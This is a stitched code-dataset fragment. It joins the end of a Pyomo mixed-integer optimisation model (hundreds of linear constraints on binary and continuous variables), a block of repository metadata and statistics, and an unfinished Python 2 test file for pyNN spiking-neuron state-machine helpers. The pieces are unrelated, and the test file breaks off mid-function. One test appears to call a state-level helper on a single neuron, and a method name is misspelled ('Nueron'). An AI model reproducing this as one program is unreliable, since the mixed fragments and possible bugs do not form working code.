m.c2066 = Constraint(expr= m.b296 + m.b299 + m.b310 + m.b326 >= 1)
m.c2067 = Constraint(expr= m.b296 + m.b299 + m.b310 + m.b321 >= 1)
m.c2068 = Constraint(expr= m.b296 + m.b299 + m.b306 + m.b330 >= 1)
m.c2069 = Constraint(expr= m.b296 + m.b299 + m.b306 + m.b326 + m.b331 >= 1)
m.c2070 = Constraint(expr= m.b296 + m.b299 + m.b306 + m.b325 >= 1)
m.c2071 = Constraint(expr= m.b296 + m.b299 + m.b306 + m.b321 >= 1)
m.c2072 = Constraint(expr= m.b296 + m.b299 + m.b306 + m.b318 + m.b331 >= 1)
m.c2073 = Constraint(expr= m.b296 + m.b299 + m.b306 + m.b318 + m.b326 >= 1)
m.c2074 = Constraint(expr= m.b296 + m.b299 + m.b306 + m.b318 + m.b321 >= 1)
m.c2075 = Constraint(expr= m.b296 + m.b299 + m.b306 + m.b317 + m.b331 >= 1)
m.c2076 = Constraint(expr= m.b296 + m.b299 + m.b306 + m.b317 + m.b326 >= 1)
m.c2077 = Constraint(expr= m.b296 + m.b299 + m.b306 + m.b317 + m.b321 >= 1)
m.c2078 = Constraint(expr= m.b296 + m.b299 + m.b306 + m.b312 + m.b331 >= 1)
m.c2079 = Constraint(expr= m.b296 + m.b299 + m.b306 + m.b312 + m.b326 >= 1)
m.c2080 = Constraint(expr= m.b296 + m.b299 + m.b306 + m.b312 + m.b321 >= 1)
m.c2081 = Constraint(expr= m.b296 + m.b299 + m.b305 + m.b331 >= 1)
m.c2082 = Constraint(expr= m.b296 + m.b299 + m.b305 + m.b326 >= 1)
m.c2083 = Constraint(expr= m.b296 + m.b299 + m.b305 + m.b321 >= 1)
m.c2084 = Constraint(expr= m.b296 + m.b299 + m.b302 + m.b331 >= 1)
m.c2085 = Constraint(expr= m.b296 + m.b299 + m.b302 + m.b326 >= 1)
m.c2086 = Constraint(expr= m.b296 + m.b299 + m.b302 + m.b321 >= 1)
m.c2087 = Constraint(expr= m.b296 + m.b299 + m.b302 + m.b318 + m.b331 >= 1)
m.c2088 = Constraint(expr= m.b296 + m.b299 + m.b302 + m.b318 + m.b326 >= 1)
m.c2089 = Constraint(expr= m.b296 + m.b299 + m.b302 + m.b318 + m.b321 >= 1)
m.c2090 = Constraint(expr= m.b296 + m.b299 + m.b302 + m.b312 + m.b331 >= 1)
m.c2091 = Constraint(expr= m.b296 + m.b299 + m.b302 + m.b312 + m.b326 >= 1)
m.c2092 = Constraint(expr= m.b296 + m.b299 + m.b302 + m.b312 + m.b321 >= 1)
m.c2093 = Constraint(expr= m.b296 + m.b298 + m.b331 >= 1)
m.c2094 = Constraint(expr= m.b296 + m.b298 + m.b326 >= 1)
m.c2095 = Constraint(expr= m.b296 + m.b298 + m.b321 >= 1)
m.c2096 = Constraint(expr= m.b295 + m.b329 >= 1)
m.c2097 = Constraint(expr= m.b295 + m.b326 + m.b330 >= 1)
m.c2098 = Constraint(expr= m.b295 + m.b325 + m.b331 >= 1)
m.c2099 = Constraint(expr= m.b295 + m.b324 >= 1)
m.c2100 = Constraint(expr= m.b295 + m.b321 + m.b331 >= 1)
m.c2101 = Constraint(expr= m.b295 + m.b321 + m.b326 >= 1)
m.c2102 = Constraint(expr= m.b295 + m.b320 >= 1)
m.c2103 = Constraint(expr= m.b295 + m.b318 + m.b330 >= 1)
m.c2104 = Constraint(expr= m.b295 + m.b318 + m.b326 + m.b331 >= 1)
m.c2105 = Constraint(expr= m.b295 + m.b318 + m.b325 >= 1)
m.c2106 = Constraint(expr= m.b295 + m.b318 + m.b321 >= 1)
m.c2107 = Constraint(expr= m.b295 + m.b317 + m.b330 >= 1)
m.c2108 = Constraint(expr= m.b295 + m.b317 + m.b326 + m.b331 >= 1)
m.c2109 = Constraint(expr= m.b295 + m.b317 + m.b325 >= 1)
m.c2110 = Constraint(expr= m.b295 + m.b317 + m.b321 >= 1)
m.c2111 = Constraint(expr= m.b295 + m.b316 + m.b331 >= 1)
m.c2112 = Constraint(expr= m.b295 + m.b316 + m.b326 >= 1)
m.c2113 = Constraint(expr= m.b295 + m.b316 + m.b321 >= 1)
m.c2114 = Constraint(expr= m.b295 + m.b312 + m.b330 >= 1)
m.c2115 = Constraint(expr= m.b295 + m.b312 + m.b325 >= 1)
m.c2116 = Constraint(expr= m.b295 + m.b312 + m.b321 >= 1)
m.c2117 = Constraint(expr= m.b295 + m.b312 + m.b318 + m.b330 >= 1)
m.c2118 = Constraint(expr= m.b295 + m.b312 + m.b318 + m.b326 + m.b331 >= 1)
m.c2119 = Constraint(expr= m.b295 + m.b312 + m.b318 + m.b325 >= 1)
m.c2120 = Constraint(expr= m.b295 + m.b312 + m.b318 + m.b321 >= 1)
m.c2121 = Constraint(expr= m.b295 + m.b312 + m.b317 + m.b331 >= 1)
m.c2122 = Constraint(expr= m.b295 + m.b312 + m.b317 + m.b326 >= 1)
m.c2123 = Constraint(expr= m.b295 + m.b312 + m.b317 + m.b321 >= 1)
m.c2124 = Constraint(expr= m.b295 + m.b311 + m.b330 >= 1)
m.c2125 = Constraint(expr= m.b295 + m.b311 + m.b326 + m.b331 >= 1)
m.c2126 = Constraint(expr= m.b295 + m.b311 + m.b325 >= 1)
m.c2127 = Constraint(expr= m.b295 + m.b311 + m.b321 >= 1)
m.c2128 = Constraint(expr= m.b295 + m.b311 + m.b318 + m.b331 >= 1)
m.c2129 = Constraint(expr= m.b295 + m.b311 + m.b318 + m.b326 >= 1)
m.c2130 = Constraint(expr= m.b295 + m.b311 + m.b318 + m.b321 >= 1)
m.c2131 = Constraint(expr= m.b295 + m.b310 + m.b331 >= 1)
m.c2132 = Constraint(expr= m.b295 + m.b310 + m.b326 >= 1)
m.c2133 = Constraint(expr= m.b295 + m.b310 + m.b321 >= 1)
m.c2134 = Constraint(expr= m.b295 + m.b306 + m.b330 >= 1)
m.c2135 = Constraint(expr= m.b295 + m.b306 + m.b326 + m.b331 >= 1)
m.c2136 = Constraint(expr= m.b295 + m.b306 + m.b325 >= 1)
m.c2137 = Constraint(expr= m.b295 + m.b306 + m.b321 >= 1)
m.c2138 = Constraint(expr= m.b295 + m.b306 + m.b318 + m.b331 >= 1)
m.c2139 = Constraint(expr= m.b295 + m.b306 + m.b318 + m.b326 >= 1)
m.c2140 = Constraint(expr= m.b295 + m.b306 + m.b318 + m.b321 >= 1)
m.c2141 = Constraint(expr= m.b295 + m.b306 + m.b312 + m.b331 >= 1)
m.c2142 = Constraint(expr= m.b295 + m.b306 + m.b312 + m.b326 >= 1)
m.c2143 = Constraint(expr= m.b295 + m.b306 + m.b312 + m.b321 >= 1)
m.c2144 = Constraint(expr= m.b295 + m.b305 + m.b331 >= 1)
m.c2145 = Constraint(expr= m.b295 + m.b305 + m.b326 >= 1)
m.c2146 = Constraint(expr= m.b295 + m.b305 + m.b321 >= 1)
m.c2147 = Constraint(expr= m.b295 + m.b302 + m.b331 >= 1)
m.c2148 = Constraint(expr= m.b295 + m.b302 + m.b326 >= 1)
m.c2149 = Constraint(expr= m.b295 + m.b302 + m.b321 >= 1)
m.c2150 = Constraint(expr= m.b295 + m.b299 + m.b331 >= 1)
m.c2151 = Constraint(expr= m.b295 + m.b299 + m.b326 >= 1)
m.c2152 = Constraint(expr= m.b295 + m.b299 + m.b321 >= 1)
m.c2153 = Constraint(expr= m.b294 + m.b331 >= 1)
m.c2154 = Constraint(expr= m.b294 + m.b326 >= 1)
m.c2155 = Constraint(expr= m.b294 + m.b321 >= 1)
m.c2156 = Constraint(expr= m.b294 - m.b295 >= 0)
m.c2157 = Constraint(expr= m.b295 - m.b296 >= 0)
m.c2158 = Constraint(expr= m.b297 - m.b298 >= 0)
m.c2159 = Constraint(expr= m.b298 - m.b299 >= 0)
m.c2160 = Constraint(expr= m.b300 - m.b301 >= 0)
m.c2161 = Constraint(expr= m.b301 - m.b302 >= 0)
m.c2162 = Constraint(expr= m.b303 - m.b304 >= 0)
m.c2163 = Constraint(expr= m.b304 - m.b305 >= 0)
m.c2164 = Constraint(expr= m.b305 - m.b306 >= 0)
m.c2165 = Constraint(expr= m.b307 - m.b308 >= 0)
m.c2166 = Constraint(expr= m.b308 - m.b309 >= 0)
m.c2167 = Constraint(expr= m.b309 - m.b310 >= 0)
m.c2168 = Constraint(expr= m.b310 - m.b311 >= 0)
m.c2169 = Constraint(expr= m.b311 - m.b312 >= 0)
m.c2170 = Constraint(expr= m.b313 - m.b314 >= 0)
m.c2171 = Constraint(expr= m.b314 - m.b315 >= 0)
m.c2172 = Constraint(expr= m.b315 - m.b316 >= 0)
m.c2173 = Constraint(expr= m.b316 - m.b317 >= 0)
m.c2174 = Constraint(expr= m.b317 - m.b318 >= 0)
m.c2175 = Constraint(expr= m.b319 - m.b320 >= 0)
m.c2176 = Constraint(expr= m.b320 - m.b321 >= 0)
m.c2177 = Constraint(expr= m.b322 - m.b323 >= 0)
m.c2178 = Constraint(expr= m.b323 - m.b324 >= 0)
m.c2179 = Constraint(expr= m.b324 - m.b325 >= 0)
m.c2180 = Constraint(expr= m.b325 - m.b326 >= 0)
m.c2181 = Constraint(expr= m.b327 - m.b328 >= 0)
m.c2182 = Constraint(expr= m.b328 - m.b329 >= 0)
m.c2183 = Constraint(expr= m.b329 - m.b330 >= 0)
m.c2184 = Constraint(expr= m.b330 - m.b331 >= 0)
m.c2185 = Constraint(expr= m.b332 - m.b333 >= 0)
m.c2186 = Constraint(expr= m.b333 - m.b334 >= 0)
m.c2187 = Constraint(expr= m.b334 - m.b335 >= 0)
m.c2188 = Constraint(expr= m.b335 - m.b336 >= 0)
m.c2189 = Constraint(expr= m.b336 - m.b337 >= 0)
m.c2190 = Constraint(expr= m.b338 - m.b339 >= 0)
m.c2191 = Constraint(expr= m.b339 - m.b340 >= 0)
m.c2192 = Constraint(expr= m.b340 - m.b341 >= 0)
m.c2193 = Constraint(expr= m.b341 - m.b342 >= 0)
m.c2194 = Constraint(expr= m.b343 - m.b344 >= 0)
m.c2195 = Constraint(expr= m.b344 - m.b345 >= 0)
m.c2196 = Constraint(expr= m.b346 - m.b347 >= 0)
m.c2197 = Constraint(expr= m.b347 - m.b348 >= 0)
m.c2198 = Constraint(expr= m.b349 - m.b350 >= 0)
m.c2199 = Constraint(expr= m.b350 - m.b351 >= 0)
m.c2200 = Constraint(expr= m.b352 - m.b353 >= 0)
m.c2201 = Constraint(expr= m.b353 - m.b354 >= 0)
m.c2202 = Constraint(expr= m.b354 - m.b355 >= 0)
m.c2203 = Constraint(expr= m.x155 - m.x156 >= 0)
m.c2204 = Constraint(expr= m.x156 - m.x157 >= 0)
m.c2205 = Constraint(expr= m.x157 - m.x158 >= 0)
m.c2206 = Constraint(expr= m.x121 - 0.1*m.b294 - 0.573333333333333*m.b295 - 0.1*m.b296 == 1.24666666666667)
m.c2207 = Constraint(expr= m.x122 - 0.193333333333333*m.b297 - 1.14666666666667*m.b298 - 0.193333333333333*m.b299
== 2.48)
m.c2208 = Constraint(expr= m.x123 - 0.226666666666667*m.b300 - 1.36*m.b301 - 0.226666666666667*m.b302
== 2.94666666666667)
m.c2209 = Constraint(expr= m.x124 - 0.28*m.b303 - 1.42*m.b304 - 0.286666666666667*m.b305 - 0.28*m.b306
== 3.69333333333333)
m.c2210 = Constraint(expr= m.x125 - 1.91333333333333*m.b307 - 7.65333333333333*m.b308 - 1.91333333333333*m.b309
- 1.91333333333333*m.b310 - 1.91333333333333*m.b311 - 1.91333333333333*m.b312
== 24.8733333333333)
m.c2211 = Constraint(expr= m.x126 - 4.51333333333333*m.b313 - 18.0533333333333*m.b314 - 4.51333333333333*m.b315
- 4.50666666666667*m.b316 - 4.51333333333333*m.b317 - 4.51333333333333*m.b318
== 58.6666666666667)
m.c2212 = Constraint(expr= m.x127 - 0.313333333333333*m.b319 - 1.88666666666667*m.b320 - 0.313333333333333*m.b321
== 4.08)
m.c2213 = Constraint(expr= m.x128 - 2.81333333333333*m.b322 - 14.06*m.b323 - 2.80666666666667*m.b324
- 2.81333333333333*m.b325 - 2.81333333333333*m.b326 == 36.56)
m.c2214 = Constraint(expr= m.x129 - 2.56*m.b327 - 12.7933333333333*m.b328 - 2.56*m.b329 - 2.56*m.b330
- 2.55333333333333*m.b331 == 33.26)
m.c2215 = Constraint(expr= m.x130 - 1.88666666666667*m.b332 - 7.54666666666667*m.b333 - 1.88666666666667*m.b334
- 1.88666666666667*m.b335 - 1.88666666666667*m.b336 - 1.88666666666667*m.b337 == 24.52)
m.c2216 = Constraint(expr= m.x131 - 2.84*m.b338 - 14.2*m.b339 - 2.84*m.b340 - 2.84*m.b341 - 2.84666666666667*m.b342
== 36.9266666666667)
m.c2217 = Constraint(expr= m.x132 - 3.85333333333333*m.b343 - 23.1133333333333*m.b344 - 3.85333333333333*m.b345
== 50.0866666666667)
m.c2218 = Constraint(expr= m.x133 - 1.24666666666667*m.b346 - 7.47333333333333*m.b347 - 1.24*m.b348
== 16.1866666666667)
m.c2219 = Constraint(expr= m.x134 - 1.81333333333333*m.b349 - 10.8533333333333*m.b350 - 1.81333333333333*m.b351
== 23.52)
m.c2220 = Constraint(expr= m.x135 - 2.96666666666667*m.b352 - 14.82*m.b353 - 2.96*m.b354 - 2.96666666666667*m.b355
== 38.5266666666667)
m.c2221 = Constraint(expr= - m.x136 + m.x279 <= 0)
m.c2222 = Constraint(expr= - m.x137 + m.x280 <= 0)
m.c2223 = Constraint(expr= - m.x138 + m.x281 <= 0)
m.c2224 = Constraint(expr= - m.x139 + m.x282 <= 0)
m.c2225 = Constraint(expr= - m.x140 + m.x283 <= 0)
m.c2226 = Constraint(expr= - m.x141 + m.x284 <= 0)
m.c2227 = Constraint(expr= - m.x142 + m.x285 <= 0)
m.c2228 = Constraint(expr= - m.x143 + m.x286 <= 0)
m.c2229 = Constraint(expr= - m.x144 + m.x287 <= 0)
m.c2230 = Constraint(expr= - m.x145 + m.x288 <= 0)
m.c2231 = Constraint(expr= - m.x146 + m.x289 <= 0)
m.c2232 = Constraint(expr= - m.x147 + m.x290 <= 0)
m.c2233 = Constraint(expr= - m.x148 + m.x291 <= 0)
m.c2234 = Constraint(expr= - m.x149 + m.x292 <= 0)
m.c2235 = Constraint(expr= - m.x150 + m.x293 <= 0)
| 35.545585
| 118
| 0.604196
| 31,684
| 173,889
| 3.315964
| 0.089256
| 0.297688
| 0.31838
| 0.028983
| 0.808629
| 0.765902
| 0.723994
| 0.567041
| 0.50149
| 0.195559
| 0
| 0.296595
| 0.19532
| 173,889
| 4,891
| 119
| 35.552852
| 0.454258
| 0.003911
| 0
| 0.003037
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.00038
| 0
| 0.00038
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
485bfb09788bacd2c5ffd0f1e69ee28ffc5daf91
| 23,499
|
py
|
Python
|
tests/fsaTests.py
|
dainiuskreivenas/rbs
|
1d371963ccd64976b3f0603dead891f51996cfb1
|
[
"MIT"
] | 1
|
2021-10-04T17:44:04.000Z
|
2021-10-04T17:44:04.000Z
|
tests/fsaTests.py
|
dainiuskreivenas/rbs
|
1d371963ccd64976b3f0603dead891f51996cfb1
|
[
"MIT"
] | 12
|
2019-07-16T08:31:50.000Z
|
2019-11-19T17:58:53.000Z
|
tests/fsaTests.py
|
dainiuskreivenas/rbs
|
1d371963ccd64976b3f0603dead891f51996cfb1
|
[
"MIT"
] | null | null | null |
#import pyNN.spiNNaker as sim
import pyNN.nest as sim
from .. import FSAHelperFunctions
from .. import NealCoverFunctions
simName = "nest"
runtime = 1000
def createNeurons(fsa):
ca = sim.Population(fsa.CA_SIZE, sim.IF_cond_exp, fsa.CELL_PARAMS, label = "CA")
fsa.makeCA(ca, 0)
ca2 = sim.Population(fsa.CA_SIZE, sim.IF_cond_exp, fsa.CELL_PARAMS, label = "CA 2")
fsa.makeCA(ca2, 0)
ca3 = sim.Population(fsa.CA_SIZE, sim.IF_cond_exp, fsa.CELL_PARAMS, label = "CA 3")
fsa.makeCA(ca3, 0)
n1 = sim.Population(1, sim.IF_cond_exp, fsa.CELL_PARAMS, label = "Neuron 1")
n2 = sim.Population(1, sim.IF_cond_exp, fsa.CELL_PARAMS, label = "Neuron 2")
n3 = sim.Population(1, sim.IF_cond_exp, fsa.CELL_PARAMS, label = "Neuron 3")
n1.record("spikes")
n2.record("spikes")
n3.record("spikes")
ca.record("spikes")
ca2.record("spikes")
ca3.record("spikes")
return ca,ca2,ca3,n1,n2,n3
def stateToState():
neal = NealCoverFunctions(simName, sim)
fsa = FSAHelperFunctions(simName, sim, neal)
ca,ca2,ca3,n1,n2,n3 = createNeurons(fsa)
fsa.stateTurnsOnState(ca,0,ca2,0)
spikeTimes = {'spike_times': [[sim.get_current_time()+5]]}
spikeGen = sim.Population(1, sim.SpikeSourceArray, spikeTimes)
fsa.turnOnStateFromSpikeSource(spikeGen,ca,0)
neal.nealApplyProjections()
sim.run(runtime)
success = len(ca2.get_data().segments[0].spiketrains[0]) > 0
if(not success):
data = ca.get_data()
print "ca"
print data.segments[0].spiketrains[0]
data = ca2.get_data()
print "ca2 "
print data.segments[0].spiketrains[0]
print "State To State - {}".format(success)
def stateToNeuron():
neal = NealCoverFunctions(simName, sim)
fsa = FSAHelperFunctions(simName, sim, neal)
ca,ca2,ca3,n1,n2,n3 = createNeurons(fsa)
fsa.stateTurnsOnOneNeuron(ca,0,n1,0)
spikeTimes = {'spike_times': [[sim.get_current_time()+5]]}
spikeGen = sim.Population(1, sim.SpikeSourceArray, spikeTimes)
fsa.turnOnStateFromSpikeSource(spikeGen,ca,0)
neal.nealApplyProjections()
sim.run(runtime)
success = len(n1.get_data().segments[0].spiketrains[0]) > 0
if(not success):
data = ca.get_data()
print "ca"
print data.segments[0].spiketrains[0]
data = n1.get_data()
print "n1"
print data.segments[0].spiketrains[0]
print "State To Neuron - {}".format(success)
def twoStateToState():
neal = NealCoverFunctions(simName, sim)
fsa = FSAHelperFunctions(simName, sim, neal)
ca,ca2,ca3,n1,n2,n3 = createNeurons(fsa)
fsa.stateHalfTurnsOnState(ca,0,ca3,0)
fsa.stateHalfTurnsOnState(ca2,0,ca3,0)
spikeTimes = {'spike_times': [[sim.get_current_time()+5]]}
spikeGen = sim.Population(1, sim.SpikeSourceArray, spikeTimes)
fsa.turnOnStateFromSpikeSource(spikeGen,ca,0)
fsa.turnOnStateFromSpikeSource(spikeGen,ca2,0)
neal.nealApplyProjections()
sim.run(runtime)
success = len(ca3.get_data().segments[0].spiketrains[0]) > 0
if(not success):
data = ca.get_data()
print "ca"
print data.segments[0].spiketrains[0]
data = ca2.get_data()
print "ca2"
print data.segments[0].spiketrains[0]
data = ca3.get_data()
print "ca3"
print data.segments[0].spiketrains[0]
print "2 State To State - {}".format(success)
def twoStateToState_Half():
neal = NealCoverFunctions(simName, sim)
fsa = FSAHelperFunctions(simName, sim, neal)
ca,ca2,ca3,n1,n2,n3 = createNeurons(fsa)
fsa.stateHalfTurnsOnState(ca,0,ca3,0)
fsa.stateHalfTurnsOnState(ca2,0,ca3,0)
spikeTimes = {'spike_times': [[sim.get_current_time()+5]]}
spikeGen = sim.Population(1, sim.SpikeSourceArray, spikeTimes)
fsa.turnOnStateFromSpikeSource(spikeGen,ca,0)
neal.nealApplyProjections()
sim.run(runtime)
success = len(ca3.get_data().segments[0].spiketrains[0]) == 0
if(not success):
data = ca.get_data()
print "ca"
print data.segments[0].spiketrains[0]
data = ca2.get_data()
print "ca2"
print data.segments[0].spiketrains[0]
data = ca3.get_data()
print "ca3"
print data.segments[0].spiketrains[0]
print "2 State To State Half - {}".format(success)
def twoStateToNeuron():
neal = NealCoverFunctions(simName, sim)
fsa = FSAHelperFunctions(simName, sim, neal)
ca,ca2,ca3,n1,n2,n3 = createNeurons(fsa)
fsa.stateHalfTurnsOnOneNueron(ca,0,n1,0)
fsa.stateHalfTurnsOnOneNueron(ca2,0,n1,0)
spikeTimes = {'spike_times': [[sim.get_current_time()+5]]}
spikeGen = sim.Population(1, sim.SpikeSourceArray, spikeTimes)
fsa.turnOnStateFromSpikeSource(spikeGen,ca,0)
fsa.turnOnStateFromSpikeSource(spikeGen,ca2,0)
neal.nealApplyProjections()
sim.run(runtime)
success = len(n1.get_data().segments[0].spiketrains[0]) > 0
if(not success):
data = ca.get_data()
print "ca"
print data.segments[0].spiketrains[0]
data = ca2.get_data()
print "ca2"
print data.segments[0].spiketrains[0]
data = n1.get_data()
print "n1"
print data.segments[0].spiketrains[0]
print "2 State To Neruon - {}".format(success)
def twoStateToNeuron_Half():
neal = NealCoverFunctions(simName, sim)
fsa = FSAHelperFunctions(simName, sim, neal)
ca,ca2,ca3,n1,n2,n3 = createNeurons(fsa)
fsa.stateHalfTurnsOnOneNueron(ca,0,n1,0)
fsa.stateHalfTurnsOnOneNueron(ca2,0,n1,0)
spikeTimes = {'spike_times': [[sim.get_current_time()+5]]}
spikeGen = sim.Population(1, sim.SpikeSourceArray, spikeTimes)
fsa.turnOnStateFromSpikeSource(spikeGen,ca,0)
neal.nealApplyProjections()
sim.run(runtime)
success = len(n1.get_data().segments[0].spiketrains[0]) == 0
if(not success):
data = ca.get_data()
print "ca"
print data.segments[0].spiketrains[0]
data = ca2.get_data()
print "ca2"
print data.segments[0].spiketrains[0]
data = n1.get_data()
print "n1"
print data.segments[0].spiketrains[0]
print "2 State To Neruon Half - {}".format(success)
def neuronToState():
neal = NealCoverFunctions(simName, sim)
fsa = FSAHelperFunctions(simName, sim, neal)
ca,ca2,ca3,n1,n2,n3 = createNeurons(fsa)
fsa.stateTurnsOnOneNeuron(ca,0,n1,0)
fsa.oneNeuronTurnsOnState(n1,0,ca2,0)
spikeTimes = {'spike_times': [[sim.get_current_time()+5]]}
spikeGen = sim.Population(1, sim.SpikeSourceArray, spikeTimes)
fsa.turnOnStateFromSpikeSource(spikeGen,ca,0)
neal.nealApplyProjections()
sim.run(runtime)
success = len(ca2.get_data().segments[0].spiketrains[0]) > 0
if(not success):
data = ca.get_data()
print "ca"
print data.segments[0].spiketrains[0]
data = ca2.get_data()
print "ca2"
print data.segments[0].spiketrains[0]
data = n1.get_data()
print "n1"
print data.segments[0].spiketrains[0]
print "Neruon To State - {}".format(success)
def neuronToNeuron():
neal = NealCoverFunctions(simName, sim)
fsa = FSAHelperFunctions(simName, sim, neal)
ca,ca2,ca3,n1,n2,n3 = createNeurons(fsa)
fsa.stateTurnsOnOneNeuron(ca,0,n1,0)
fsa.oneNeuronTurnsOnOneNeuron(n1,0,n2,0)
spikeTimes = {'spike_times': [[sim.get_current_time()+5]]}
spikeGen = sim.Population(1, sim.SpikeSourceArray, spikeTimes)
fsa.turnOnStateFromSpikeSource(spikeGen,ca,0)
neal.nealApplyProjections()
sim.run(runtime)
success = len(n2.get_data().segments[0].spiketrains[0]) > 0
if(not success):
data = ca.get_data()
print "ca"
print data.segments[0].spiketrains[0]
data = n1.get_data()
print "n1"
print data.segments[0].spiketrains[0]
data = n2.get_data()
print "n2"
print data.segments[0].spiketrains[0]
print "Neruon To Neuron - {}".format(success)
def twoNeuronToState():
neal = NealCoverFunctions(simName, sim)
fsa = FSAHelperFunctions(simName, sim, neal)
ca,ca2,ca3,n1,n2,n3 = createNeurons(fsa)
fsa.stateTurnsOnOneNeuron(ca,0,n1,0)
fsa.stateTurnsOnOneNeuron(ca,0,n2,0)
fsa.oneNeuronHalfTurnsOnState(n1,0,ca2,0)
fsa.oneNeuronHalfTurnsOnState(n2,0,ca2,0)
spikeTimes = {'spike_times': [[sim.get_current_time()+5]]}
spikeGen = sim.Population(1, sim.SpikeSourceArray, spikeTimes)
fsa.turnOnStateFromSpikeSource(spikeGen,ca,0)
neal.nealApplyProjections()
sim.run(runtime)
success = len(ca2.get_data().segments[0].spiketrains[0]) > 0
if(not success):
data = ca.get_data()
print "ca"
print data.segments[0].spiketrains[0]
data = ca2.get_data()
print "ca2"
print data.segments[0].spiketrains[0]
data = n1.get_data()
print "n1"
print data.segments[0].spiketrains[0]
data = n2.get_data()
print "n2"
print data.segments[0].spiketrains[0]
print "2 Neruon To State - {}".format(success)
def twoNeuronToState_Half():
neal = NealCoverFunctions(simName, sim)
fsa = FSAHelperFunctions(simName, sim, neal)
ca,ca2,ca3,n1,n2,n3 = createNeurons(fsa)
fsa.stateTurnsOnOneNeuron(ca,0,n1,0)
fsa.oneNeuronHalfTurnsOnState(n1,0,ca2,0)
fsa.oneNeuronHalfTurnsOnState(n2,0,ca2,0)
spikeTimes = {'spike_times': [[sim.get_current_time()+5]]}
spikeGen = sim.Population(1, sim.SpikeSourceArray, spikeTimes)
fsa.turnOnStateFromSpikeSource(spikeGen,ca,0)
neal.nealApplyProjections()
sim.run(runtime)
success = len(ca2.get_data().segments[0].spiketrains[0]) == 0
if (not success):
data = ca.get_data()
print "ca"
print data.segments[0].spiketrains[0]
data = ca2.get_data()
print "ca2"
print data.segments[0].spiketrains[0]
data = n1.get_data()
print "n1"
print data.segments[0].spiketrains[0]
data = n2.get_data()
print "n2"
print data.segments[0].spiketrains[0]
print "2 Neruon To State Half - {}".format(success)
def twoNeuronToNeuron():
neal = NealCoverFunctions(simName, sim)
fsa = FSAHelperFunctions(simName, sim, neal)
ca,ca2,ca3,n1,n2,n3 = createNeurons(fsa)
fsa.stateTurnsOnOneNeuron(ca,0,n1,0)
fsa.stateTurnsOnOneNeuron(ca,0,n2,0)
fsa.oneNeuronHalfTurnsOnOneNeuron(n1,0,n3,0)
fsa.oneNeuronHalfTurnsOnOneNeuron(n2,0,n3,0)
spikeTimes = {'spike_times': [[sim.get_current_time()+5]]}
spikeGen = sim.Population(1, sim.SpikeSourceArray, spikeTimes)
fsa.turnOnStateFromSpikeSource(spikeGen,ca,0)
neal.nealApplyProjections()
sim.run(runtime)
success = len(n3.get_data().segments[0].spiketrains[0]) > 0
if (not success):
data = ca.get_data()
print "ca"
print data.segments[0].spiketrains[0]
data = n1.get_data()
print "n1"
print data.segments[0].spiketrains[0]
data = n2.get_data()
print "n2"
print data.segments[0].spiketrains[0]
data = n3.get_data()
print "n3"
print data.segments[0].spiketrains[0]
print "2 Neruon To Neuron - {}".format(success)
def twoNeuronToNeuron_Half():
neal = NealCoverFunctions(simName, sim)
fsa = FSAHelperFunctions(simName, sim, neal)
ca,ca2,ca3,n1,n2,n3 = createNeurons(fsa)
fsa.stateTurnsOnOneNeuron(ca,0,n1,0)
fsa.oneNeuronHalfTurnsOnState(n1,0,n3,0)
fsa.oneNeuronHalfTurnsOnState(n2,0,n3,0)
spikeTimes = {'spike_times': [[sim.get_current_time()+5]]}
spikeGen = sim.Population(1, sim.SpikeSourceArray, spikeTimes)
fsa.turnOnStateFromSpikeSource(spikeGen,ca,0)
neal.nealApplyProjections()
sim.run(runtime)
success = len(n3.get_data().segments[0].spiketrains[0]) == 0
if(not success):
data = ca.get_data()
print "ca"
print data.segments[0].spiketrains[0]
data = n1.get_data()
print "n1"
print data.segments[0].spiketrains[0]
data = n2.get_data()
print "n2"
print data.segments[0].spiketrains[0]
data = n3.get_data()
print "n3"
print data.segments[0].spiketrains[0]
print "2 Neruon To Neuron Half - {}".format(success)
def neruonAndStateToState():
neal = NealCoverFunctions(simName, sim)
fsa = FSAHelperFunctions(simName, sim, neal)
ca,ca2,ca3,n1,n2,n3 = createNeurons(fsa)
fsa.stateTurnsOnOneNeuron(ca,0,n1,0)
fsa.oneNeuronHalfTurnsOnState(n1,0,ca3,0)
fsa.stateHalfTurnsOnState(ca2,0,ca3,0)
spikeTimes = {'spike_times': [[sim.get_current_time()+5]]}
spikeGen = sim.Population(1, sim.SpikeSourceArray, spikeTimes)
fsa.turnOnStateFromSpikeSource(spikeGen,ca,0)
fsa.turnOnStateFromSpikeSource(spikeGen,ca2,0)
neal.nealApplyProjections()
sim.run(runtime)
success = len(ca3.get_data().segments[0].spiketrains[0]) > 0
if(not success):
data = ca.get_data()
print "ca"
print data.segments[0].spiketrains[0]
data = ca2.get_data()
print "ca2"
print data.segments[0].spiketrains[0]
data = ca3.get_data()
print "ca3"
print data.segments[0].spiketrains[0]
data = n1.get_data()
print "n1"
print data.segments[0].spiketrains[0]
print "Neuron And State To State - {}".format(success)
def neruonAndStateToState_NotNeuron():
neal = NealCoverFunctions(simName, sim)
fsa = FSAHelperFunctions(simName, sim, neal)
ca,ca2,ca3,n1,n2,n3 = createNeurons(fsa)
fsa.stateTurnsOnOneNeuron(ca,0,n1,0)
fsa.oneNeuronHalfTurnsOnState(n1,0,ca3,0)
fsa.stateHalfTurnsOnState(ca2,0,ca3,0)
spikeTimes = {'spike_times': [[sim.get_current_time()+5]]}
spikeGen = sim.Population(1, sim.SpikeSourceArray, spikeTimes)
fsa.turnOnStateFromSpikeSource(spikeGen,ca2,0)
neal.nealApplyProjections()
sim.run(runtime)
success = len(ca3.get_data().segments[0].spiketrains[0]) == 0
if not success:
data = ca.get_data()
print "ca"
print data.segments[0].spiketrains[0]
data = ca2.get_data()
print "ca2"
print data.segments[0].spiketrains[0]
data = ca3.get_data()
print "ca3"
print data.segments[0].spiketrains[0]
data = n1.get_data()
print "n1"
print data.segments[0].spiketrains[0]
print "Neuron And State To State NotNeuron - {}".format(success)
def neruonAndStateToState_NotState():
neal = NealCoverFunctions(simName, sim)
fsa = FSAHelperFunctions(simName, sim, neal)
ca,ca2,ca3,n1,n2,n3 = createNeurons(fsa)
fsa.stateTurnsOnOneNeuron(ca,0,n1,0)
